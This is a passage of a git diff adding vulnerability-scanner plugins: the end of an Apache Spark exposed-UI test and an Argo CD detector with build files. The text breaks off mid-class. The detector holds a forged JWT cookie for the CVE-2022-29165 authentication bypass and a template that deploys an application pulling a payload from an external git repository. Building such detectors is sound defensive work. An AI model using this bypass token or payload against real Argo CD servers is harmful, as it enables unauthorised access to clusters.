mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + 
.setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_WebUI")) + .setSeverity(Severity.MEDIUM) + .setTitle( + "Exposed Apache Spark UI which discloses information about the Apache" + + " Spark environment and its' tasks.") + .setDescription( + "An exposed Apache Spark Web UI provides attackers information about" + + " the Apache Spark UI and its' tasks. The disclosed information" + + " might leak other configured Apache Spark nodes and the output" + + " of previously run tasks. Depending on the task, the output" + + " might contain sensitive information which was logged during the" + + " task execution.") + .setRecommendation( + "Don't expose the Apache Spark Web UI to unauthenticated attackers.")) + .build()); + } + + @Test + public void detect_ifNotVulnerable_doNotReportsVuln() throws IOException { + mockWebServer.setDispatcher(new SafeEndpointDispatcher()); + mockWebServer.start(); + + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private static final class VulnerableEndpointDispatcher extends Dispatcher { + + @Override + public MockResponse dispatch(RecordedRequest recordedRequest) { + return new MockResponse() + .setResponseCode(HttpStatus.OK.code()) + .setBody( + "<title>Spark Worker at 192.168.48.3:36075"); + } + } + + private static final class 
SafeEndpointDispatcher extends Dispatcher { + + @Override + public MockResponse dispatch(RecordedRequest recordedRequest) { + return new MockResponse().setResponseCode(HttpStatus.FORBIDDEN.code()).setBody(""); + } + } + + private static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } +} diff --git a/community/detectors/argocd_exposed_ui/README.md b/community/detectors/argocd_exposed_ui/README.md new file mode 100644 index 000000000..7eaf53ed1 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/README.md @@ -0,0 +1,15 @@ +# Exposed Argo CD instances Detector + +This Tsunami plugin tests to see if the Argo CD Instances are misconfigured and +exposed. It Also Checks for CVE-2022-29165 which is an authentication bypass and +try to create a separate report for this Vulnerability. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/argocd_exposed_ui/build.gradle b/community/detectors/argocd_exposed_ui/build.gradle new file mode 100644 index 000000000..05b9f058a --- /dev/null +++ b/community/detectors/argocd_exposed_ui/build.gradle 
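Review bot: `detect_ifNotVulnerable_doNotReportsVuln` only serves a 403 with an empty body, so the path in the detector where the status is 200 but the body lacks one of the two markers is never exercised. A second negative case whose dispatcher returns `HttpStatus.OK` with a page that mentions Spark but has no `collapse-aggregated-` marker, for example `new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody("<html><title>Spark</title></html>")` (a constructed sample), would pin the false-positive behaviour of the fingerprint. The `mockCallbackServer` field is declared but never assigned or used in this class and can be removed.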
@@ -0,0 +1,69 @@ +plugins { + id 'java-library' +} + +description = 'Exposed Argo CD instances VulnDetector plugin.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + okhttpVersion = '3.12.0' + truthVersion = '1.0.1' + guiceVersion = '4.2.3' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation 'com.google.auto.value:auto-value:1.10.4' + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation 
"com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.jar b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.properties b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/argocd_exposed_ui/gradlew b/community/detectors/argocd_exposed_ui/gradlew new file mode 100755 index 000000000..f5feea6d6 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/gradlew 
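Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block is a dynamic version, so the three `com.google.tsunami` artifacts this plugin compiles against are whatever is newest at build time, and two builds of the same commit can resolve differently. I would pin it, `tsunamiVersion = '<released-version>'` (placeholder: the version the plugin was tested against). The `repositories` block also lists `mavenLocal()`, which, combined with a dynamic version, may let a locally installed artifact be selected; consider dropping it for release builds.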
@@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/argocd_exposed_ui/gradlew.bat b/community/detectors/argocd_exposed_ui/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/gradlew.bat 
@@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 
1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/argocd_exposed_ui/settings.gradle b/community/detectors/argocd_exposed_ui/settings.gradle new file mode 100644 index 000000000..504db73ac --- /dev/null +++ b/community/detectors/argocd_exposed_ui/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'exposed_argocd_instance_detector' diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/Annotations.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/Annotations.java new file mode 100644 index 000000000..990484010 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/Annotations.java 
@@ -0,0 +1,35 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.exposedui.argocd;
+
+import static java.lang.annotation.ElementType.FIELD;
+import static java.lang.annotation.ElementType.METHOD;
+import static java.lang.annotation.ElementType.PARAMETER;
+
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+import javax.inject.Qualifier;
+
+/** Annotation for {@link ExposedArgoCdApiDetector}. */
+final class Annotations {
+ @Qualifier
+ @Retention(RetentionPolicy.RUNTIME)
+ @Target({PARAMETER, METHOD, FIELD})
+ @interface OobSleepDuration {}
+
+ private Annotations() {}
+}
diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetector.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetector.java
new file mode 100644
index 000000000..842109fa4
--- /dev/null
+++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetector.java
@@ -0,0 +1,447 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.delete; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.collect.ImmutableSet; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.gson.JsonParseException; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.plugin.PluginType; 
+import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugins.detectors.exposedui.argocd.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionReportList.Builder; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects exposed ArgoCD API server. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + + // name of the plugin + name = "ExposedArgoCDDetector", + version = "0.1", + + // detailed description of the plugin + description = + "This plugin detects exposed and misconfigured ArgoCD API server." + + "Exposed Argo CD API servers allow attackers to access kubernetes clusters." 
+ + "Attackers can change parameters of clusters and possibly compromise it.", + author = "JamesFoxxx", + bootstrapModule = ExposedArgoCdApiDetectorBootstrapModule.class) +public final class ExposedArgoCdApiDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final PayloadGenerator payloadGenerator; + private final Clock utcClock; + private final HttpClient httpClient; + private final int oobSleepDuration; + + // The URL that host the payload as a git repository + // This url might be changed in the future, so I make it easy to change + private final String PAYLOAD_GIT_URL = "https://github.com/JamesFoxxx/argo-cd-app"; + // The Path to the directory of payload on the git repository + private final String PAYLOAD_GIT_PATH = "payloads/jsonnet-guestbook-tla"; + + // The JWT session value as a part of the CVE-2022-29165 payload + @VisibleForTesting + static final String PAYLOAD_ARGOCD_TOKEN_SESSION = + "argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9." + + "TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ"; + + // This is a template for creating an Argo CD application, we should fill four part of this + // payload. 
+ private final String CREATE_APPLICATION_TEMPLATE = + "{\"apiVersion\":\"argoproj.io/v1alpha1\",\"kind\":\"Application\"," + + "\"metadata\":{\"name\":\"tsunami-security-scanner\"},\"spec\"" + + ":{\"destination\":{\"name\":\"\",\"namespace\":" + + "\"tsunami-security-scanner\",\"server\":" + + "\"%s\"},\"source\":{\"path\":" + + "\"%s\",\"repoURL\":" + + "\"%s\",\"targetRevision\":" + + "\"HEAD\",\"directory\":{\"jsonnet\":{\"tlas\":[{\"name\":" + + "\"payload\",\"value\":" + + "\"\\\"%s\\\"\"" + + ",\"code\":true}]}}},\"sources\":[],\"project\":\"%s\"," + + "\"syncPolicy\":{\"automated\":{\"prune\":false," + + "\"selfHeal\":false}}}}"; + + @Inject + ExposedArgoCdApiDetector( + HttpClient httpClient, + @UtcClock Clock utcClock, + PayloadGenerator payloadGenerator, + @OobSleepDuration int oobSleepDuration) { + this.httpClient = + checkNotNull(httpClient) + .modify() + .setFollowRedirects(true) + .setTrustAllCertificates(true) + .build(); + this.utcClock = checkNotNull(utcClock); + this.payloadGenerator = checkNotNull(payloadGenerator); + this.oobSleepDuration = oobSleepDuration; + } + + private static final ImmutableSet HTTP_EQUIVALENT_SERVICE_NAMES = + ImmutableSet.of( + "", + "unknown", // nmap could not determine the service name, we try to exploit anyway. 
+ "ssl/cpudpencap"); + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("Starting exposed Argo CD API servers detection by out-of-band callback."); + + Builder detectionReport = DetectionReportList.newBuilder(); + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + // filter services which are in scope + .filter(this::isInScopeService) + // check if the services are vulnerable + // Build a DetectionReport when the Argo CD UI is exposed publicly by admin access otherwise + // check if it is vulnerable to CVE-2022-29165 + .forEach( + networkService -> { + if (isServicePubliclyExposed(networkService, true)) { + // Argo CD API server is exposed publicly without any authentication, and it is + // confirmed by receiving an out-of-band callback + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is misconfigured. " + + "The API server is not authenticated. " + + "All applications can be accessed by the public and therefore can be " + + "modified resulting in all application instances being compromised. " + + "The Argo CD UI does not support executing OS commands " + + "in the hosting machine at this time. " + + "We detected this vulnerable Argo CD API server by creating " + + "a test application and receiving out-of-band callback", + "Please disable public access to your Argo CD API server.", + Severity.CRITICAL)); + } else if (isServiceVulnerableToAuthBypass(networkService, true)) { + // Argo CD API server is vulnerable to CVE-2022-29165, and it is confirmed by + // receiving an out-of-band callback + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is vulnerable to CVE-2022-29165. 
The authentication of" + + " Argo CD API server can be bypassed and All applications can be" + + " accessed by public and therefore can be modified resulting in all" + + " application instances being compromised. The Argo CD UI does not" + + " support executing OS commands in the hosting machine at this time." + + " We detected this vulnerable Argo CD API server by receiving a HTTP" + + " response from an endpoint that needs authentication", + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. Please update Argo CD to these versions and higher.", + Severity.CRITICAL)); + } else if (isServicePubliclyExposed(networkService, false)) { + // Argo CD API server is exposed publicly without any authentication, and it is + // confirmed by receiving matching a http response body + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is misconfigured. The API server is not" + + " authenticated.We can't confirm that this API server has an admin" + + " role because we can't create a new application and receive an" + + " out-of-band callback from it, but we are able to receive some" + + " endpoint data without authentication", + "Please disable public access to your Argo CD API server.", + Severity.HIGH)); + } else if (isServiceVulnerableToAuthBypass(networkService, false)) { + // Argo CD API server is vulnerable to CVE-2022-29165, and it is + // confirmed by receiving matching a http response body + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is vulnerable to CVE-2022-29165. The authentication can" + + " be bypassed. We can't confirm that this API server has an admin" + + " role because we can't create a new application and receive an" + + " out-of-band callback from it, but we are able to receive some" + + " endpoint data without authentication", + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. 
Please update Argo CD to these versions and higher.", + Severity.HIGH)); + } + }); + return detectionReport.build(); + } + + private boolean isInScopeService(NetworkService networkService) { + return NetworkServiceUtils.isWebService(networkService) + || HTTP_EQUIVALENT_SERVICE_NAMES.contains(networkService.getServiceName()); + } + + /** Checks if a {@link NetworkService} has a misconfigured ArgoCD API server exposed. */ + private boolean isServicePubliclyExposed( + NetworkService networkService, boolean useOutOfBandCallBack) { + if (useOutOfBandCallBack) { + return checkExposedArgoCdWithOutOfBandCallback(networkService, HttpHeaders.builder()); + } else { + return checkExposedArgoCdWithResponseMatching(networkService, HttpHeaders.builder()); + } + } + + /** Checks if a {@link NetworkService} has a vulnerable ArgoCD API server to CVE-2022-29165. */ + private boolean isServiceVulnerableToAuthBypass( + NetworkService networkService, boolean useOutOfBandCallBack) { + HttpHeaders.Builder cookieHeader = + HttpHeaders.builder().addHeader("Cookie", PAYLOAD_ARGOCD_TOKEN_SESSION); + if (useOutOfBandCallBack) { + return checkExposedArgoCdWithOutOfBandCallback(networkService, cookieHeader); + } else { + return checkExposedArgoCdWithResponseMatching(networkService, cookieHeader); + } + } + + private boolean checkExposedArgoCdWithResponseMatching( + NetworkService networkService, HttpHeaders.Builder baseHeaders) { + logger.atInfo().log("Starting exposed Argo CD API servers detection by response matching."); + // the target URL of the target is built + String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + String targetUri = targetUrl + "api/v1/certificates"; + try { + // This is a blocking call. 
+ HttpResponse response = + httpClient.send(get(targetUri).setHeaders(baseHeaders.build()).build(), networkService); + return response.status().isSuccess() + && response.bodyString().isPresent() + && response.bodyString().get().contains("\"items\"") + && response.bodyString().get().contains("\"metadata\""); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + return false; + } catch (JsonSyntaxException e) { + logger.atWarning().withCause(e).log( + "JSON syntax error occurred parsing response for target URI: '%s'.", targetUri); + return false; + } + } + + private boolean checkExposedArgoCdWithOutOfBandCallback( + NetworkService networkService, HttpHeaders.Builder baseHeaders) { + // the target URL of the target is built + String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + try { + // 1. Get the first Project name + String projectsUrl = targetUrl + "api/v1/projects?fields=items.metadata.name"; + HttpResponse response = + httpClient.send(get(projectsUrl).setHeaders(baseHeaders.build()).build(), networkService); + if (response.bodyString().isEmpty()) { + return false; + } + String projectName = ""; + try { + projectName = + JsonParser.parseString(response.bodyString().get()) + .getAsJsonObject() + 